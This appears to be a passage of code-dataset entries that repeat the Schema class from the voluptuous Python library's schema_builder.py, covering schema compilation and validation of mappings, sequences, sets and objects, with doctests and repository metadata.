- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_sequence | python | def _compile_sequence(self, schema, seq_type):
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence | Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1] | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L598-L653 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_set | python | def _compile_set(self, schema):
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set | Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a'])) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L685-L723 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
